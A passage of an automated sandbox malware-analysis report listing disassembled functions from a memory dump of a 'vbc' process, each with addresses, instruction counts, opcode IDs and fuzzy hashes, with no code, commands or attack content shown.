                                                                • Instruction Fuzzy Hash: 68318DB66093019FD320CF19C851B2AF7E5FB88740F0949ADE8869B751D770E848CBA1
                                                                Function 055FAF69 Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e704e73b3a1c69197ddd758548f1fa519da818745c649f1e43d2500f80e4cdd
                                                                • Instruction ID: 58d8a01ea9df6ea0c40a190493ad606ed75490a3bcfe33bd0d867ee268010b42
                                                                • Opcode Fuzzy Hash: 0e704e73b3a1c69197ddd758548f1fa519da818745c649f1e43d2500f80e4cdd
                                                                • Instruction Fuzzy Hash: 94318F35A01129DBDB20DF69CC48FAFB7B9FF44250F0505AAE909E7210DA34AE80CB91
                                                                Function 0560A6C7 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                • Instruction ID: 03952b9ff1f9ca7e4f0b02871b674173266638f91dcfdb5830ab528de7b4c43d
                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                • Instruction Fuzzy Hash: 79313E76B04701AFD764CF69CD40B67B7F9BB48A90F04492DA59AC3B90E630E900CB64
                                                                Function 055F438F Relevance: .1, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c6e02cab547e0d40785c02a1de003034d41aa79a681b74bae0df70df0a0b27f2
                                                                • Instruction ID: dc3ad65eb45ce77ac22dcfe03f2c091cc1dea5fd376fa26852905b1bd530aa29
                                                                • Opcode Fuzzy Hash: c6e02cab547e0d40785c02a1de003034d41aa79a681b74bae0df70df0a0b27f2
                                                                • Instruction Fuzzy Hash: 9931C232B00205DFCB14EFA8C989A6FB7FABB84304F008529D646E7654E770E945CB90
                                                                Function 055CE420 Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95d38e46e89ff9a94d93470a7c3d2520be535a912a1ecc37ccdf3e6fbee751f5
                                                                • Instruction ID: 4dedf1606d4bc9c7f4606209f2353eefcd181b91ed9f5a3a15f83185b0bbf3b0
                                                                • Opcode Fuzzy Hash: 95d38e46e89ff9a94d93470a7c3d2520be535a912a1ecc37ccdf3e6fbee751f5
                                                                • Instruction Fuzzy Hash: ED31A432A4151C9FDB36DB54CC82FEEBBBDBB45740F0105E9E546A7290D674AE808F90
                                                                Function 055CC156 Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f559b3123b926ebdbb24b73b343c8aceecb53e78fff5a5791a15a54923d71533
                                                                • Instruction ID: 2143f41b8b9afa36841bb2723395326741dafefb651c0282c74918cc21ffc4a3
                                                                • Opcode Fuzzy Hash: f559b3123b926ebdbb24b73b343c8aceecb53e78fff5a5791a15a54923d71533
                                                                • Instruction Fuzzy Hash: AE3129766006108BCB24EF28C849B79BBB5BF81314F54C1A9DC469B781DA78D987CFD4
                                                                Function 0568C3CD Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                • Instruction ID: 18a0895993083eba8f5f744f2b36ddce17194d96d1fcd0d1c623e6732a67a90e
                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                • Instruction Fuzzy Hash: 3821F736700651AADB25BBD58804ABEB7B5EF80610F40861EF9968BB91E634DD80C774
                                                                Function 055D6E71 Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f988e21bcfe543db1054a6320ea148405504863e5788ed87d0d5a90fb7f4a93f
                                                                • Instruction ID: 4cf834df251b6f88a188a416fb60f3192bb874d3100c50ee560c3d86cf91d04d
                                                                • Opcode Fuzzy Hash: f988e21bcfe543db1054a6320ea148405504863e5788ed87d0d5a90fb7f4a93f
                                                                • Instruction Fuzzy Hash: E731E2716002099FDB24CFA9C841FBAF7B5FF41324F18066AE5169B2E1CB70D981C795
                                                                Function 05604588 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                • Instruction ID: bee5e0a953283c8e21ac9c4ef68aa793283899d421014111467550f1a7e5eba7
                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                • Instruction Fuzzy Hash: BC217431B00604EBCF29CFA8C584A9FB7B5FF48715F108169EE159B281EA71EA45CB90
                                                                Function 056044B0 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e54a4699a192f7739748fe132bbfa549b7f1da243293acc488680a19277fafd8
                                                                • Instruction ID: db95c7f3c52b6297092664b6e22e635a9adc5cf4e98ecbf3620e7736e9109c0a
                                                                • Opcode Fuzzy Hash: e54a4699a192f7739748fe132bbfa549b7f1da243293acc488680a19277fafd8
                                                                • Instruction Fuzzy Hash: 2321F5726087059BCB26CF18C840B6B77E5FF88721F054619FE499B380CB70E901CBA2
                                                                Function 0564E609 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5ada7f1f98cfcb587c85726ceb508a400c9dd6e358ca93ed7d5a1004bacfb980
                                                                • Instruction ID: 80f2862e03b610e0ab2db0aa2d8dba45a1a4b6a012f7681fef84064c6db8004b
                                                                • Opcode Fuzzy Hash: 5ada7f1f98cfcb587c85726ceb508a400c9dd6e358ca93ed7d5a1004bacfb980
                                                                • Instruction Fuzzy Hash: C4314D75A10205AFCB14CF5CC8849AE77BAFF88304F15445AE80A9B391E772AD91CF95
                                                                Function 055CE388 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                • Instruction ID: 408aff0de34a60285a8fb2e89ef5e520f79e6e8911bec818a64c1567ad613607
                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                • Instruction Fuzzy Hash: 40319A31600604EFD722CFA8C985F6ABBB9FF84354F1049A9E5128B680E770FE02CB50
                                                                Function 055D8D59 Relevance: .1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                • Instruction ID: c3d2d93aba9275336e73ae6b4412dbe46cd3439fa208b8383959f3fa9bfe4564
                                                                • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                • Instruction Fuzzy Hash: 81210636705685EBD729EB2CD92AB35B7A6BF40790F0905A4DD4387BD2E364DC41C260
                                                                Function 056506F1 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c623d7e2db3f7f6122ab8d1c40071457bb871f5a0a8b95c20a9ae413c78e69d
                                                                • Instruction ID: 315eca901bc02f02b207c765806629a6e3fbbd9fd7bb0113153c11d8bcfacc8b
                                                                • Opcode Fuzzy Hash: 3c623d7e2db3f7f6122ab8d1c40071457bb871f5a0a8b95c20a9ae413c78e69d
                                                                • Instruction Fuzzy Hash: 56218D71A006299BCF14DF69C885ABEBBF8FF48750F550069E841AB250E778AD41CBA4
                                                                Function 0565019F Relevance: .1, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 735381dd92cbd4cc75c6f8490993e3265c5cacaab681a187bbb17c4151777b06
                                                                • Instruction ID: 7fc609ee77d31c4e3341d204c3e366ad9782c3db1bf85f63ef96be3d5447047c
                                                                • Opcode Fuzzy Hash: 735381dd92cbd4cc75c6f8490993e3265c5cacaab681a187bbb17c4151777b06
                                                                • Instruction Fuzzy Hash: A621AE71600645AFC725DBA8C948F6AB7B8FF88750F1400A9F905DBBA0D634ED40CB68
                                                                Function 05650283 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cbf28b74215434a7d9137bb49123867f5bac711387f441fc3254b7bea42dea82
                                                                • Instruction ID: bfd96cc50e7ea4a2cafdb16a716bbc96676b7165313b0a35ea6240dd979f23fb
                                                                • Opcode Fuzzy Hash: cbf28b74215434a7d9137bb49123867f5bac711387f441fc3254b7bea42dea82
                                                                • Instruction Fuzzy Hash: A421AF72A482469BC721EF69D94CF6BBBECBF80360F080856BD8487651D734E905C6A2
                                                                Function 055D6C50 Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                • Instruction ID: 889f40a61eb211d937050bc9ad76e58fa51a75b7592a0f4fa41149f7ec972652
                                                                • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                • Instruction Fuzzy Hash: 95318B76605604CFC720CF58C190B26BBE5FB48714F2485ADE94A8BB52DB31E942CBA0
                                                                Function 0568A49A Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e2d17fd6290b6a51b949bae06e439e3ac7909332daab7756afa2df658805a1cc
                                                                • Instruction ID: 3024c01c9525bc79ca95041ed162e873516f3b24885346d0a89d2d597f20c715
                                                                • Opcode Fuzzy Hash: e2d17fd6290b6a51b949bae06e439e3ac7909332daab7756afa2df658805a1cc
                                                                • Instruction Fuzzy Hash: F4110A72380F117FD7226699DC05F37B69ADBC5B70F11022ABE48DB290EA70DC05C696
                                                                Function 0560A30B Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f2d365772ec4c70fc9e5ad8a7626a3c0809d129b6b1bdba36cb457086909880
                                                                • Instruction ID: dcfe4f0f0264919aba244c4ae5505e1d739a1ed178a8c9af856d58a16a665f09
                                                                • Opcode Fuzzy Hash: 2f2d365772ec4c70fc9e5ad8a7626a3c0809d129b6b1bdba36cb457086909880
                                                                • Instruction Fuzzy Hash: C921AC35210B419FC729DF68C801B5677F5FF48B44F2484A8A50ACBB61E731E842CF98
                                                                Function 056680A8 Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                • Instruction ID: 03b98b16a2e520f2f2b8c3f75ccfbc453283f759e05e29a28cfac8f9711df835
                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                • Instruction Fuzzy Hash: 16215872A0020AAFDB129FA4CC44FAEBBFAFF88314F210859F915A7250D634D951CB50
                                                                Function 05650E7F Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63175b3698e5cbfdbacc7697ef9dcefc1d00b9da30574c1a33e93dd143d651e2
                                                                • Instruction ID: 282ca409730d6f9466f326fb7c98a33c6a7b286c80f25ff64007efba8d5411a7
                                                                • Opcode Fuzzy Hash: 63175b3698e5cbfdbacc7697ef9dcefc1d00b9da30574c1a33e93dd143d651e2
                                                                • Instruction Fuzzy Hash: D8219372600604ABC725DB69C898EABBBB9FF88750F14056DF906D7750D634E900CB54
                                                                Function 055D8770 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c568e9ac3f4a9a322248d20324ae90c8ac018f68fed6aae01a60f0843aa5637
                                                                • Instruction ID: b85eaca95a0fbd17ca12e644a197cdd6bc4de789664718f2407b3df6b68bfd7e
                                                                • Opcode Fuzzy Hash: 9c568e9ac3f4a9a322248d20324ae90c8ac018f68fed6aae01a60f0843aa5637
                                                                • Instruction Fuzzy Hash: 041194377056119BCB66CF4DC5C0A66F7E9FF8A750B1840ADED09AF204D6B2D901C7A0
                                                                Function 05600124 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                • Instruction ID: 45a9f8ab120825e0bdc8ae45aa8120b240c80c302e14fd2ef73859877254a0d4
                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                • Instruction Fuzzy Hash: 93110473600605BFD7269F94CC48FABBBB9EB80764F1044A9F6048B2D0D671ED44CB54
                                                                Function 05674F42 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                • Instruction ID: e1e0cb14de43ad0f3df38aeda5776426055f3b2fc619a06045badc2fb17e0325
                                                                • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                • Instruction Fuzzy Hash: 0D215E75A00219EFCB05CF99C884DAEBBB9FF98304B1140A9E805AB351DB319E41CBA0
                                                                Function 055D80E9 Relevance: .1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce8985ad4d4475cd10c9e4a2a33e69a0f112dad8132906e37e29919d7d4ecc7e
                                                                • Instruction ID: ea9272c8775766b20f65898ec80ed51db3df3d3e051280d84043d4c933fd5e4b
                                                                • Opcode Fuzzy Hash: ce8985ad4d4475cd10c9e4a2a33e69a0f112dad8132906e37e29919d7d4ecc7e
                                                                • Instruction Fuzzy Hash: 7D214C76A00205DFCB24CF98C591A6EFBB6FB88318F24416DD105A7350DB71AD0ACBE0
                                                                Function 0560674D Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 943028a4985d703ef91098671a74bb23ffd9a86b6c154a5402126386f88a9fe6
                                                                • Instruction ID: 36c12b547c166698500e022ad94579189f4bfeac31ddd813709f83632ceb8a84
                                                                • Opcode Fuzzy Hash: 943028a4985d703ef91098671a74bb23ffd9a86b6c154a5402126386f88a9fe6
                                                                • Instruction Fuzzy Hash: FD215871610A00EFC768CF69C881B76B7E9FF84650F40982DE4AAC7690DA70E860CB64
                                                                Function 056066B0 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd0a1f6d2372bb470cec33b2640dab31806d205fba50f90b236af364df25c909
                                                                • Instruction ID: d8ba085b66f0c552ca4139df88a208d887abbb33aceabb8aabc189523b5962c6
                                                                • Opcode Fuzzy Hash: dd0a1f6d2372bb470cec33b2640dab31806d205fba50f90b236af364df25c909
                                                                • Instruction Fuzzy Hash: 7811CE76A11205EFCB29CF59C584E6BBBEAAF84610F01507AE9069B350DA70DD11CBA0
                                                                Function 055D2F12 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b22bd5353f81daf3df4ef5325810307eefef850806f6804fa016df1c7d584e1
                                                                • Instruction ID: 60a2d260d0380c70e32d53fb5e67e69204b29d9410aee794ebc221a0aa553714
                                                                • Opcode Fuzzy Hash: 1b22bd5353f81daf3df4ef5325810307eefef850806f6804fa016df1c7d584e1
                                                                • Instruction Fuzzy Hash: F911A3373143125BD631A71DD886B7AEAD5FB84A50F54081AF50697290DAB0D840C6F9
                                                                Function 0565E7E1 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                • Instruction ID: 0cc1fdb69b2c3623e1727437af5966d9c61c90c727ff69e0a3b8f8c24f67b65a
                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                • Instruction Fuzzy Hash: 06119132644604EFDF749F44C844B56B7AAFB45764F0584ADEC0A9B250D732DE40D790
                                                                Function 055F27ED Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b22b551e81469407ace1bc399e29df264414f5189e01132e88f032d165620f77
                                                                • Instruction ID: 083c980e15988cefe92181f3c09e948cf8628282a9818fd1def2f8dba2a96185
                                                                • Opcode Fuzzy Hash: b22b551e81469407ace1bc399e29df264414f5189e01132e88f032d165620f77
                                                                • Instruction Fuzzy Hash: 02012675309684AFE326A2ADEC59F277B8DFF80390F0904A4F9418B690DA24DC00C3B1
                                                                Function 055D4690 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: efc42d486d9c307a2add8da50f0a44a45f3112bbd0162afbba0003119470359b
                                                                • Instruction ID: 26f28c3b6656eb19901b9dd91a2a84623288a712bb2ab9eda4542256f88f45e2
                                                                • Opcode Fuzzy Hash: efc42d486d9c307a2add8da50f0a44a45f3112bbd0162afbba0003119470359b
                                                                • Instruction Fuzzy Hash: 57116A37205644EFCB35CA59D884B6ABBA5FB86A64F004519F8058B250C7B0E841CFA0
                                                                Function 05606620 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8daec9ca8dba6169c903f5d717e6624133b32b4d42f9d517308a0903f4fcea5f
                                                                • Instruction ID: fdb38ea468ec9166460d1faa40091af8b4be0e85c3f1d10f766e86eeafab2e10
                                                                • Opcode Fuzzy Hash: 8daec9ca8dba6169c903f5d717e6624133b32b4d42f9d517308a0903f4fcea5f
                                                                • Instruction Fuzzy Hash: E011AC72A10615ABCB25DF58C980B5FFBB8FF84740F510459E906A7740DB30E991CBA1
                                                                Function 055FE53E Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                • Instruction ID: 12b87ffbb8e22e166759931ade8da677d05c454a3398ef6b18a8e11cf6949df9
                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                • Instruction Fuzzy Hash: 2911E572A056C6DFD7229728C949B29B7D9BB41788F1A04E0EE4187B91F72CD842C350
                                                                Function 0565E75D Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
